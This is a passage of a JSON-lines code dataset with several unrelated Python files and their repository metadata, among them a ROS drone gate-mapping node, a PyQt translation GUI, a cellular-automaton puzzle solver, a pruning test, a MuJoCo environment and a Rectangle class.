gate.add_marker_observation(marker)\n self.gates.append(gate)\n return\n\n for g in self.gates:\n\n print(g.name, g.total_observations, g.confidence)\n\n if g.euclidean_distance_observation(marker) < self.d_threshold:\n g.add_marker_observation(marker)\n return\n\n # Create a new gate in the map\n gate = Gate(len(self.gates)+1)\n gate.add_marker_observation(marker)\n self.gates.append(gate)\n\n\n\n\nclass SubscriberPublisherObservations:\n\n def __init__(self, node_name):\n\n self.node_name = node_name\n\n # Params\n _input_markers_topic = rospy.get_param(\"~input_markers_topic\", default='/markertracker_node/gate_markers')\n self.camera_frame_id = rospy.get_param(\"~parent_frame_id\", default='firefly/vi_sensor/base_link')\n self.fixed_frame_id = rospy.get_param(\"~fixed_frame_id\", default='world')\n\n # Subscribers\n self.markers_sub = rospy.Subscriber(_input_markers_topic, GateMarkersArray, self._markers_callback, queue_size=100)\n self.tf_buffer = tf2.Buffer()\n self.tf_listener = tf2.TransformListener(self.tf_buffer)\n\n # To store the gate map\n self.gates_map = GateMap()\n\n\n # Publishers\n self.poses_pub = rospy.Publisher(node_name + '/poses', PoseArray, queue_size=100)\n self.viz_markers_pub = rospy.Publisher(node_name + '/visualization_markers', MarkerArray, queue_size=100)\n\n ## Rospy loop\n r = rospy.Rate(5)\n while not rospy.is_shutdown():\n #self.marker_viz_pub.publish(self.ground_truth_markers)\n #self.gate_pose_pub.publish(self.ground_truth_poses)\n\n # Publish best map estimations\n self._build_gate_messages_and_publish()\n\n r.sleep()\n\n\n\n def _build_gate_messages_and_publish(self):\n\n #TODO: move to params\n _confidence_threshold = 0.05 # Ignore gates with lower confidence than threshold\n\n if len(self.gates_map.gates) == 0: return False\n\n marker_viz_array = MarkerArray()\n pose_array = PoseArray()\n pose_array.header.frame_id = self.fixed_frame_id\n\n for g in self.gates_map.gates:\n\n if g.confidence < _confidence_threshold: continue\n\n pose = g.get_best_pose_estimation()\n gate_id = g.id\n\n pose_array.poses.append(pose)\n\n marker_msg = self._create_gate_rviz_marker(pose, gate_id, self.fixed_frame_id)\n _str_label = \"{} {:.0f}%\".format(g.name, g.confidence*100)\n label_msg = self._create_gate_rviz_label(pose, gate_id, _str_label, self.fixed_frame_id)\n marker_viz_array.markers.append(label_msg)\n marker_viz_array.markers.append(marker_msg)\n\n\n self.poses_pub.publish(pose_array)\n self.viz_markers_pub.publish(marker_viz_array)\n\n\n def _create_gate_rviz_marker(self, pose, gate_id, frame_id):\n\n marker = Marker()\n marker.header.stamp = rospy.Time.now()\n\n marker.header.frame_id = frame_id\n marker.ns = self.node_name + '/gate_marker'\n marker.id = gate_id\n\n marker.type = marker.CUBE\n marker.action = marker.ADD\n\n # TODO: dims to params\n marker.scale.x = 0.025\n marker.scale.y = 1\n marker.scale.z = 1\n\n marker.color.r = 1.0\n marker.color.g = 1.0\n marker.color.b = 1.0\n marker.color.a = 0.5\n\n marker.lifetime = rospy.Duration() # forever\n\n marker.pose = pose\n\n return marker\n\n def _create_gate_rviz_label(self, pose, gate_id, text, frame_id):\n\n marker = Marker()\n marker.header.stamp = rospy.Time.now()\n\n marker.header.frame_id = frame_id\n marker.ns = self.node_name + '/gate_label'\n marker.id = gate_id\n\n marker.text = text\n marker.type = marker.TEXT_VIEW_FACING\n marker.action = marker.ADD\n\n # TODO: dims to params\n #marker.scale.x = 0.025\n #marker.scale.y = 1\n marker.scale.z = 0.5\n\n marker.color.r = 1.0\n marker.color.g = 
1.0\n marker.color.b = 1.0\n marker.color.a = 0.75\n\n marker.lifetime = rospy.Duration() # forever\n\n marker.pose = pose\n\n return marker\n\n\n def _markers_callback(self, data):\n\n if len(data.marker) <= 0:\n return None\n\n stamp = data.camera_frame_stamp # For synchronizing TF\n\n try:\n camera_tf = self.tf_buffer.lookup_transform(self.fixed_frame_id, self.camera_frame_id, stamp, rospy.Duration(0.1))\n #print('camera_tf', camera_tf)\n except (tf2.LookupException, tf2.ConnectivityException, tf2.ExtrapolationException):\n return None\n\n # world_pose_array = MarkersArray()\n\n for m in data.marker:\n pose = m.pose_cov_stamped.pose\n #print(pose)\n pose_stamped_world = do_transform_pose(pose, camera_tf)\n m.pose_cov_stamped.pose.pose = pose_stamped_world\n self.gates_map.process_marker_observation(m)\n\n #print(pose_stamped_world)\n\n\n\n\n\nif __name__ == '__main__':\n\n _node_name = 'gates_map_node'\n\n print('* {} starting... '.format(_node_name), end=\"\")\n\n rospy.init_node(_node_name, anonymous=True)\n\n SubscriberPublisherObservations(_node_name)\n\n print('Ready.')\n\n rospy.spin()\n","repo_name":"Veilkrand/drone_race","sub_path":"drone_map_builder/src/observed_gates_map_node.py","file_name":"observed_gates_map_node.py","file_ext":"py","file_size_in_byte":9229,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"12126928287","text":"from src.measurements.channel_measurements.base_channel_measurement import BaseChannelMeasurement\nfrom src.constants import (PACKET_DROPPED, EXECTION_TIME, READ_TIME,\n PACKET_PUSHED, PACKET_RETRIEVED, FILL_TIME)\n\n\nclass PacketLifeTimeMeasurement(BaseChannelMeasurement):\n \"\"\"Calculate the value of the spent time of packets in specific channels channel_packet_life_time\n \"\"\"\n def run(self):\n channels = self._channel_manager.get_channels()\n channels_packet_life_time = [self.__calculate_channel_packet_life_time(c)\n for c in channels]\n\n total_packets_life = sum(channels_packet_life_time)\n for i, channel in enumerate(channels):\n if total_packets_life:\n packet_life_time = channels_packet_life_time[i] / total_packets_life * 100\n else:\n packet_life_time = 0\n\n channel.add_measure(self._measurement_key,\n [self._packet_cycle, packet_life_time])\n\n self._packet_cycle += 1\n\n def __calculate_channel_packet_life_time(self, channel):\n \"\"\"Calculate the value of the spent time of packets in specific channels channel_packet_life_time\n which is the sum of the following events :\n fill_time_avg =sum of average time spent between acquiring the Packets and pushing it into the buffers\n read_time_avg= sum of average time spent between retrieving a Packet and releasing it by the retriever\n exec_time_avg= sum of average time spent by a Scheduler thread servicing a Channel callback\n (pushed_time_avg-retrieved_time_avg) time between pushing packet into buffer and retrieving it for execution\n\n Args:\n channel: the channel which we want to calculate the measurement for\n\n Returns:\n A real number represents the channel share of the packet's life time\n \"\"\"\n\n fill_time_avg = self.__sum_average_of_event(channel, FILL_TIME)\n read_time_avg = self.__sum_average_of_event(channel, READ_TIME)\n exec_time_avg = self.__sum_average_of_event(channel, EXECTION_TIME)\n pushed_time_avg = self.__sum_average_of_event(channel, PACKET_PUSHED)\n retrieved_time_avg = self.__sum_average_of_event(channel, PACKET_RETRIEVED)\n\n channel_packet_life_time = fill_time_avg + read_time_avg + exec_time_avg + 
abs(retrieved_time_avg -\n pushed_time_avg)\n\n return channel_packet_life_time\n\n def _measure(self, channel):\n pass\n\n @staticmethod\n def __sum_average_of_event(channel, event):\n \"\"\" calculate the sum of the average values of specific event of the channel sum_average\n Args:\n channel: the channel which we want to calculate the sum of the average values of specific events\n event : the name of the event we want to calculate sum of the average values for\n\n Returns:\n An integer or real number represent the sum of averages\n \"\"\"\n\n avg = [x.get_avg() for x in channel.get_event(event)]\n return sum(avg)\n","repo_name":"gerazo/pipert","sub_path":"log_analyzer/src/measurements/channel_measurements/packet_life_time_measurement.py","file_name":"packet_life_time_measurement.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"28881528809","text":"from zipfile import ZipFile\n\nfrom pandas import read_csv\nfrom numpy import load\n\nfrom talos.utils.load_model import load_model\n\n\nclass Restore:\n\n '''Restores the scan_object that had been stored locally as a result\n of talos.Deploy(scan_object, 'example')\n\n USE:\n\n diabetes = ta.Scan(x, y, p, input_model)\n ta.Deploy(diabetes, 'diabetes')\n ta.Restore('diabetes.zip')\n\n '''\n\n def __init__(self, path_to_zip):\n\n # create paths\n self.path_to_zip = path_to_zip\n self.extract_to = path_to_zip.replace('.zip', '')\n self.package_name = self.extract_to.split('/')[-1]\n self.file_prefix = self.extract_to + '/' + self.package_name\n\n # extract the zip\n # unpack_archive(self.path_to_zip, self.extract_to)\n z = ZipFile(self.path_to_zip, mode='r')\n z.extractall(self.extract_to)\n\n # add params dictionary\n self.params = load(self.file_prefix + '_params.npy').item()\n\n # add experiment details\n self.details = read_csv(self.file_prefix + '_details.txt', header=None)\n\n # add x data sample\n self.x = read_csv(self.file_prefix + '_x.csv', header=None)\n\n # add y data sample\n self.y = read_csv(self.file_prefix + '_y.csv', header=None)\n\n # add model\n self.model = load_model(self.file_prefix + '_model')\n\n # add results\n self.results = read_csv(self.file_prefix + '_results.csv')\n self.results.drop('Unnamed: 0', axis=1, inplace=True)\n\n # clean up\n del self.extract_to, self.file_prefix\n del self.package_name, self.path_to_zip\n","repo_name":"gaskamichal/talos","sub_path":"talos/commands/restore.py","file_name":"restore.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"42968972641","text":"from __future__ import annotations\n\nfrom enum import Enum\nfrom typing import List, Optional, Set, TextIO\n\nINPUT = \"input\"\n\nNEIGHBOUR_VECTORS = [(-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1), (1, 0), (1, 1)]\n\n\nclass SeatStatus(Enum):\n EMPTY = \"L\"\n FULL = \"#\"\n FLOOR = \".\"\n\n\nclass Cell:\n def __init__(self, status: str, x: int, y: int) -> None:\n self.status = SeatStatus(status)\n self.x = x\n self.y = y\n self.neighbours: List[Cell] = []\n\n @property\n def is_empty(self) -> bool:\n return self.status == SeatStatus.EMPTY\n\n @property\n def is_full(self) -> bool:\n return self.status == SeatStatus.FULL\n\n @property\n def is_floor(self) -> bool:\n return self.status == SeatStatus.FLOOR\n\n def toggle(self) -> None:\n if self.is_full:\n self.status = SeatStatus.EMPTY\n else:\n self.status = SeatStatus.FULL\n\n def 
compute_neighbours(self, grid: Grid, strict_adjacency: bool) -> None:\n for x_vector, y_vector in NEIGHBOUR_VECTORS:\n x_offset = 0\n y_offset = 0\n while True:\n x_offset += x_vector\n y_offset += y_vector\n\n point = grid.safe_get_point(self.x + x_offset, self.y + y_offset)\n if point is None:\n break\n if not point.is_floor:\n self.neighbours.append(point)\n break\n if strict_adjacency:\n break\n\n def __str__(self) -> str:\n return str(self.status.value)\n\n\nclass Grid:\n def __init__(self, fin: TextIO, strict_adjacency: bool, num_occupied_to_move: int) -> None:\n self.grid = [[Cell(val, x, y) for x, val in enumerate(line.strip())] for y, line in enumerate(fin)]\n self.num_occupied_to_move = num_occupied_to_move\n\n self.could_change = set()\n for y in range(len(self.grid)):\n for x in range(len(self.grid[y])):\n if not self.grid[y][x].is_floor:\n self.grid[y][x].compute_neighbours(self, strict_adjacency)\n\n self.could_change.add(self.grid[y][x])\n\n def safe_get_point(self, x: int, y: int) -> Optional[Cell]:\n if 0 <= y < len(self.grid):\n if 0 <= x < len(self.grid[y]):\n return self.grid[y][x]\n return None\n\n def step(self) -> bool:\n changes: List[Cell] = []\n new_could_change: Set[Cell] = set()\n for point in self.could_change:\n neighbours = point.neighbours\n if point.is_empty and not any(p.is_full for p in neighbours):\n changes.append(point)\n elif point.is_full and sum(p.is_full for p in neighbours) >= self.num_occupied_to_move:\n changes.append(point)\n else:\n continue\n new_could_change.update(neighbours)\n new_could_change.add(point)\n\n self.could_change = new_could_change\n for update in changes:\n update.toggle()\n return len(changes) > 0\n\n def num_occupied(self) -> int:\n return sum(p.is_full for row in self.grid for p in row)\n\n def __str__(self) -> str:\n return \"\\n\".join(\"\".join(str(x) for x in row) for row in self.grid) + \"\\n\"\n\n\ndef main() -> None:\n with open(INPUT, \"r\") as fin:\n part_1_grid = Grid(fin, True, 4)\n with open(INPUT, \"r\") as fin:\n part_2_grid = Grid(fin, False, 5)\n\n while part_1_grid.step():\n pass\n\n while part_2_grid.step():\n pass\n\n print(part_1_grid.num_occupied())\n print(part_2_grid.num_occupied())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NickG123/AdventOfCode2020","sub_path":"Day 11/day11.py","file_name":"day11.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17793755087","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\n#!/usr/bin/env python\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import (QApplication, QWidget, QToolTip, QPushButton, QMessageBox)\r\nfrom PyQt5.QtCore import QUrl\r\nimport webbrowser\r\nimport http.client, urllib.parse\r\nfrom PyQt5.QtGui import QDesktopServices\r\n\r\nclass Ui_HCI(object):\r\n def setupUi(self, HCI):\r\n HCI.setObjectName(\"HCI\")\r\n HCI.resize(1187, 837)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Segoe UI\")\r\n font.setPointSize(14)\r\n font.setBold(False)\r\n font.setWeight(50)\r\n HCI.setFont(font)\r\n self.centralwidget = QtWidgets.QWidget(HCI)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.textEdit = QtWidgets.QTextEdit(self.centralwidget)\r\n self.textEdit.setGeometry(QtCore.QRect(30, 230, 411, 381))\r\n font = QtGui.QFont()\r\n font.setPointSize(12)\r\n self.textEdit.setFont(font)\r\n self.textEdit.setObjectName(\"textEdit\")\r\n data = self.textEdit.toPlainText()\r\n self.textEdit_2 = 
QtWidgets.QTextEdit(self.centralwidget)\r\n self.textEdit_2.setReadOnly(True)\r\n self.textEdit_2.setGeometry(QtCore.QRect(740, 230, 411, 381))\r\n self.textEdit_2.setObjectName(\"textEdit_2\")\r\n self.commandLinkButton = QtWidgets.QCommandLinkButton(self.centralwidget)\r\n self.commandLinkButton.setGeometry(QtCore.QRect(20, 760, 225, 48))\r\n self.commandLinkButton.setObjectName(\"commandLinkButton\")\r\n self.commandLinkButton_2 = QtWidgets.QCommandLinkButton(self.centralwidget)\r\n self.commandLinkButton_2.setGeometry(QtCore.QRect(930, 750, 225, 48))\r\n self.commandLinkButton_2.setObjectName(\"commandLinkButton_2\")\r\n self.commandLinkButton_3 = QtWidgets.QCommandLinkButton(self.centralwidget)\r\n self.commandLinkButton_3.setGeometry(QtCore.QRect(510, 380, 151, 48))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Segoe UI\")\r\n font.setPointSize(12)\r\n self.commandLinkButton_3.setFont(font)\r\n self.commandLinkButton_3.setObjectName(\"commandLinkButton_3\")\r\n '''self.comboBox = QtWidgets.QComboBox(self.centralwidget)\r\n self.comboBox.setGeometry(QtCore.QRect(30, 140, 231, 51))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Segoe UI\")\r\n font.setPointSize(10)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.comboBox.setFont(font)\r\n self.comboBox.setObjectName(\"comboBox\")\r\n self.comboBox.addItem(\"\")\r\n self.comboBox.addItem(\"\")'''\r\n self.comboBox_3 = QtWidgets.QComboBox(self.centralwidget)\r\n self.comboBox_3.setGeometry(QtCore.QRect(740, 140, 231, 51))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Segoe UI\")\r\n font.setPointSize(10)\r\n font.setBold(True)\r\n font.setUnderline(False)\r\n font.setWeight(75)\r\n self.comboBox_3.setFont(font)\r\n self.comboBox_3.setObjectName(\"comboBox_3\")\r\n languages = ['Afrikaans','Arabic','Bangla','Bosnian','Bulgarian','Cantonese', 'Catalan', 'Chinese Simplified', 'Chinese Traditional','Croatian', 'Czech','Danish','Dutch','English','Estonian','Fijian','Filipino','Finnish','French','German','Greek',\r\n 'Haitian Creole','Hebrew','Hindi','Hmong Daw','Hungarian','Indonesian','Italian','Japanese','Kiswahili','Klingon','Klingon (plqaD)','Korean','Latvian','Lithuanian','Malagasy'\r\n ,'Malay','Maltese','Norwegian','Persian','Polish','Portuguese','Queretaro Otomi','Romanian','Russian','Samoan','Serbian (Cyrillic)','Serbian (Latin)','Slovak','Slovenian','Spanish'\r\n ,'Swedish','Tahitian','Tamil','Thai','Tongan','Turkish','Ukrainian','Urdu','Vietnamese','Welsh','Yucatec Maya']\r\n self.comboBox_3.addItems(languages)\r\n self.label = QtWidgets.QLabel(self.centralwidget)\r\n self.label.setGeometry(QtCore.QRect(460, 10, 291, 61))\r\n font = QtGui.QFont()\r\n font.setPointSize(20)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.label.setFont(font)\r\n self.label.setObjectName(\"label\")\r\n HCI.setCentralWidget(self.centralwidget)\r\n\r\n self.retranslateUi(HCI,data)\r\n QtCore.QMetaObject.connectSlotsByName(HCI)\r\n\r\n def printfunc(self ):\r\n subscriptionKey = 'SUBSCRIPTION KEY'\r\n\r\n host = 'api.microsofttranslator.com'\r\n path = '/V2/Http.svc/Translate'\r\n\r\n test = str(self.comboBox_3.currentText())\r\n\r\n target = self.languagesel(test)\r\n if (target == 'error'):\r\n \r\n target = self.languagesel(test)\r\n else:\r\n text = self.textEdit.toPlainText()\r\n params = '?to=' + target + '&text=' + urllib.parse.quote(text)\r\n headers = {'Ocp-Apim-Subscription-Key': subscriptionKey}\r\n conn = http.client.HTTPSConnection(host)\r\n conn.request (\"GET\", path + params, None, headers)\r\n response = conn.getresponse 
()\r\n result = response.read()\r\n result = result [68 : len(result)-9]\r\n self.textEdit_2.setText(result.decode(\"utf-8\"))\r\n\r\n def retranslateUi(self, HCI,data):\r\n _translate = QtCore.QCoreApplication.translate\r\n HCI.setWindowTitle(_translate(\"HCI\", \"HCI\"))\r\n self.commandLinkButton.setText(_translate(\"HCI\", \"Report Error\"))\r\n self.commandLinkButton.clicked.connect(lambda: webbrowser.open('https://ufl.qualtrics.com/jfe/form/SV_eONVoLWuM7cjqNn'))\r\n self.commandLinkButton_2.setText(_translate(\"HCI\", \"Complete Interaction\"))\r\n self.commandLinkButton_2.clicked.connect(lambda: webbrowser.open('https://ufl.qualtrics.com/jfe/form/SV_9uY6i1QKmNNw5O5'))\r\n self.commandLinkButton_3.setText(_translate(\"HCI\", \"TRANSLATE\"))\r\n self.commandLinkButton_3.clicked.connect(self.printfunc)\r\n self.comboBox_3.setItemText(0, _translate(\"HCI\", \"Translate to\"))\r\n\r\n self.label.setText(_translate(\"HCI\", \"TRANSLATOR\"))\r\n\r\n def languagesel(self, lang):\r\n\r\n if lang == 'Afrikaans':\r\n return 'af'\r\n elif lang == 'Arabic':\r\n return 'ar'\r\n elif lang == 'Bangla':\r\n return 'bn'\r\n elif lang == 'Bosnian':\r\n return 'bs'\r\n elif lang == 'Bulgarian':\r\n return 'bg'\r\n elif lang == 'Cantonese':\r\n return 'yue'\r\n elif lang == 'Catalan':\r\n return 'ca'\r\n elif lang == 'Chinese Traditional':\r\n return 'zh-Hant'\r\n elif lang == 'Chinese Simplified':\r\n return 'zh-Hans'\r\n elif lang == 'Croatian':\r\n return 'hr'\r\n elif lang == 'Czech':\r\n return 'cs'\r\n elif lang == 'Danish':\r\n return 'da'\r\n elif lang == 'Dutch':\r\n return 'nl'\r\n elif lang == 'English':\r\n return 'en'\r\n elif lang == 'Estonian':\r\n return 'et'\r\n elif lang == 'Fijian':\r\n return 'fj'\r\n elif lang == 'Filipino':\r\n return 'fil'\r\n elif lang == 'Finnish':\r\n return 'fi'\r\n elif lang == 'French':\r\n return 'fr'\r\n elif lang == 'German':\r\n return 'de'\r\n elif lang == 'Greek':\r\n return 'el'\r\n elif lang == 'Haitian Creole':\r\n return 'ht'\r\n elif lang == 'Hebrew':\r\n return 'he'\r\n elif lang == 'Hindi':\r\n return 'hi'\r\n elif lang == 'Hmong Daw':\r\n return 'mww'\r\n elif lang == 'Hungarian':\r\n return 'hu'\r\n elif lang == 'Indonesian':\r\n return 'id'\r\n elif lang == 'Italian':\r\n return 'it'\r\n elif lang == 'Japanese':\r\n return 'ja'\r\n elif lang == 'Kiswahili':\r\n return 'sw'\r\n elif lang == 'Klingon (plqaD)':\r\n return 'tlh-Qaak'\r\n elif lang == 'Klingon':\r\n return 'tlh'\r\n elif lang == 'Korean':\r\n return 'ko'\r\n elif lang == 'Latvian':\r\n return 'lv'\r\n elif lang == 'Lithuanian':\r\n return 'lt'\r\n elif lang == 'Malagasy':\r\n return 'mg'\r\n elif lang == 'Malay':\r\n return 'ms'\r\n elif lang == 'Maltese':\r\n return 'mt'\r\n elif lang == 'Norwegian':\r\n return 'nb'\r\n elif lang == 'Persian':\r\n return 'fa'\r\n elif lang == 'Polish':\r\n return 'pl'\r\n elif lang == 'Portuguese':\r\n return 'pt'\r\n elif lang == 'Queretaro Otomi':\r\n return 'otq'\r\n elif lang == 'Romanian':\r\n return 'ro'\r\n elif lang == 'Russian':\r\n return 'ru'\r\n elif lang == 'Samoan':\r\n return 'sm'\r\n elif lang == 'Serbian (Cyrillic)':\r\n return 'sr-Cyrl'\r\n elif lang == 'Serbian (Latin)':\r\n return 'sr-Latn'\r\n elif lang == 'Slovak':\r\n return 'sk'\r\n elif lang == 'Slovenian':\r\n return 'sl'\r\n elif lang == 'Spanish':\r\n return 'es'\r\n elif lang == 'Swedish':\r\n return 'sv'\r\n elif lang == 'Tahitian':\r\n return 'ty'\r\n elif lang == 'Tamil':\r\n return 'ta'\r\n elif lang == 'Thai':\r\n return 'th'\r\n elif lang == 'Tongan':\r\n return 
'to'\r\n elif lang == 'Turkish':\r\n return 'tr'\r\n elif lang == 'Ukrainian':\r\n return 'uk'\r\n elif lang == 'Urdu':\r\n return 'ur'\r\n elif lang == 'Vietnamese':\r\n return 'vi'\r\n elif lang == 'Welsh':\r\n return 'cy'\r\n elif lang == 'Yucatec Maya':\r\n return 'yua'\r\n elif lang == 'Translate to':\r\n msg = QMessageBox()\r\n msg.setIcon(QMessageBox.Information)\r\n msg.setText(\"Please select a language to proceed with translation!\")\r\n msg.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\r\n msg.setEscapeButton(QMessageBox.Close)\r\n msg.exec_()\r\n return 'error'\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n HCI = QtWidgets.QMainWindow()\r\n ui = Ui_HCI()\r\n ui.setupUi(HCI)\r\n HCI.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"surbhijain18/Language-Translator","sub_path":"Translator.py","file_name":"Translator.py","file_ext":"py","file_size_in_byte":10289,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"30173366253","text":"import torch\nfrom torchvision.models import resnet18\nimport torch_pruning as tp\n\ndef test_taylor():\n model = resnet18(pretrained=True)\n\n # Importance criteria\n example_inputs = torch.randn(1, 3, 224, 224)\n imp = tp.importance.TaylorImportance()\n\n ignored_layers = []\n for m in model.modules():\n if isinstance(m, torch.nn.Linear) and m.out_features == 1000:\n ignored_layers.append(m) # DO NOT prune the final classifier!\n\n iterative_steps = 5 # progressive pruning\n pruner = tp.pruner.MagnitudePruner(\n model,\n example_inputs,\n importance=imp,\n iterative_steps=iterative_steps,\n ch_sparsity=0.5, # remove 50% channels, ResNet18 = {64, 128, 256, 512} => ResNet18_Half = {32, 64, 128, 256}\n ignored_layers=ignored_layers,\n )\n\n base_macs, base_nparams = tp.utils.count_ops_and_params(model, example_inputs)\n for i in range(iterative_steps):\n if isinstance(imp, tp.importance.TaylorImportance):\n # loss = F.cross_entropy(model(images), targets)\n loss = model(example_inputs).sum() # a dummy loss for TaylorImportance\n loss.backward()\n pruner.step()\n macs, nparams = tp.utils.count_ops_and_params(model, example_inputs)\n # finetune your model here\n # finetune(model)\n # ...\n\nif __name__==\"__main__\":\n test_taylor()","repo_name":"VainF/Torch-Pruning","sub_path":"tests/test_taylor_importance.py","file_name":"test_taylor_importance.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":1853,"dataset":"github-code","pt":"81"} +{"seq_id":"30479421086","text":"import numpy as np\n\nfrom rllab.core.serializable import Serializable\nfrom rllab.envs.base import Step\nfrom rllab.envs.gym_mujoco.mujoco_env import MujocoEnv\nfrom rllab.misc import logger\nfrom rllab.misc.overrides import overrides\n\n\ndef smooth_abs(x, param):\n return np.sqrt(np.square(x) + np.square(param)) - param\n\n\nclass HalfCheetahEnv(MujocoEnv, Serializable):\n\n FILE = 'half_cheetah.xml'\n\n def __init__(self, *args, target_velocity=None, **kwargs):\n super(HalfCheetahEnv, self).__init__(*args, **kwargs)\n Serializable.__init__(self, *args, **kwargs)\n self.target_velocity = target_velocity\n def get_current_obs(self):\n return np.concatenate([\n self.model.data.qpos.flatten()[1:],\n self.model.data.qvel.flat,\n ])\n\n def get_body_xmat(self, body_name):\n idx = self.model.body_names.index(body_name)\n return self.model.data.xmat[idx].reshape((3, 3))\n\n def get_body_com(self, body_name):\n 
idx = self.model.body_names.index(body_name)\n return self.model.data.com_subtree[idx]\n\n def step(self, action):\n xposbefore = self.model.data.qpos[0]\n self.forward_dynamics(action)\n xposafter = self.model.data.qpos[0]\n ob = self.get_current_obs()\n reward_ctrl = - 0.1 * np.square(action).sum()\n velocity = (xposafter - xposbefore) / self.dt\n if self.target_velocity:\n reward_run = np.abs(velocity - self.target_velocity)\n else:\n reward_run = velocity\n reward = reward_ctrl + reward_run\n done = False\n\n self.time_step += 1\n if self.max_path_length and self.time_step > self.max_path_length:\n done = True\n\n # clip reward in case mujoco sim goes crazy\n reward = np.minimum(np.maximum(-1000, reward), 1000)\n\n return ob, float(reward), done, dict(reward_run=reward_run, reward_ctrl=reward_ctrl)\n\n @overrides\n def log_diagnostics(self, paths):\n progs = [\n path[\"observations\"][-1][-3] - path[\"observations\"][0][-3]\n for path in paths\n ]\n logger.record_tabular('AverageForwardProgress', np.mean(progs))\n logger.record_tabular('MaxForwardProgress', np.max(progs))\n logger.record_tabular('MinForwardProgress', np.min(progs))\n logger.record_tabular('StdForwardProgress', np.std(progs))\n","repo_name":"jonasrothfuss/model_ensemble_meta_learning","sub_path":"rllab/envs/gym_mujoco/half_cheetah_env.py","file_name":"half_cheetah_env.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"81"} +{"seq_id":"72692559946","text":"#!/usr/bin/python3\n\"\"\"Class Rectangle\"\"\"\n\n\nfrom .base import Base\n\n\nclass Rectangle(Base):\n \"\"\"Class retangle qui herite de la class base\"\"\"\n\n def __init__(self, width, height, x=0, y=0, id=None):\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id=id)\n\n @property\n def width(self):\n \"\"\"Property\"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\"Setter\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"width must be an integer\")\n\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n\n self.__width = value\n\n @property\n def height(self):\n \"\"\"Property\"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\"Setter\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"height must be an integer\")\n\n if value <= 0:\n raise ValueError(\"height must be > 0\")\n\n self.__height = value\n\n @property\n def x(self):\n \"\"\"Property\"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\"Setter\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"x must be an integer\")\n\n if not value >= 0:\n raise ValueError(\"x must be >= 0\")\n self.__x = value\n\n @property\n def y(self):\n \"\"\"Property\"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\"Setter\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"y must be an integer\")\n\n if not value >= 0:\n raise ValueError(\"y must be >= 0\")\n self.__y = value\n\n @property\n def id(self):\n \"\"\"Property\"\"\"\n return self.__id\n\n @id.setter\n def id(self, value):\n \"\"\"Setter\"\"\"\n self.__id = value\n\n def area(self):\n \"\"\"Area Rectangle\"\"\"\n\n return self.height * self.width\n\n def display(self):\n \"\"\"Display the rectangle with #\"\"\"\n for i in range(self.height):\n for j in range(self.width):\n print(\"#\", end=\"\")\n print()\n\n def __str__(self):\n return \"[Rectangle] ({}) {}/{} - {}/{}\".format(\n self.id, self.x, self.y, 
self.width, self.height)\n\n def display(self):\n \"\"\"Recatngle # et\"\"\"\n\n for i in range(self.y):\n print(\"\")\n for i in range(self.height):\n print(\" \"*self.x + \"#\"*self.width)\n\n def update(self, *args, **kwargs):\n \"\"\"Update args\"\"\"\n\n if args:\n if len(args) > 0:\n self.id = args[0]\n if len(args) > 1:\n self.width = args[1]\n if len(args) > 2:\n self.height = args[2]\n if len(args) > 3:\n self.x = args[3]\n if len(args) > 4:\n self.y = args[4]\n\n else:\n for key, value in kwargs.items():\n setattr(self, key, value)\n\n def to_dictionary(self):\n \"\"\"Returns the dictionary representation of the square instance\"\"\"\n\n return {'id': self.id, 'width': self.width,\n 'height': self.height, 'x': self.x, 'y': self.y}\n","repo_name":"AliSeg25/holbertonschool-higher_level_programming","sub_path":"python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4461216454","text":"from flask import Flask,render_template\nfrom flask_sqlalchemy import SQLAlchemy\napp = Flask(__name__,template_folder='templates')\n# @app.route('/')\n# @app.route('/home')\n# def hello():\n# return 'hello world'\n\n# input String\n# @app.route('/home/')\n# def hello(name):\n# return 'Hello, '+name\n\n# input Integer\n# @app.route('/home/')\n# def hello(id):\n# return 'Umur : ' + str(id)\n\n# input get post\n# @app.route('/onlyget',methods=['GET'])\n# def getMetode():\n# return 'you can read this'\n\npostAll = [\n {\n 'nim' : '10112299',\n 'name' : 'ilman teguh prasetya'\n }\n]\npostAllIf = [\n {\n }\n]\n\n# @app.route('/')\n# def index():\n# 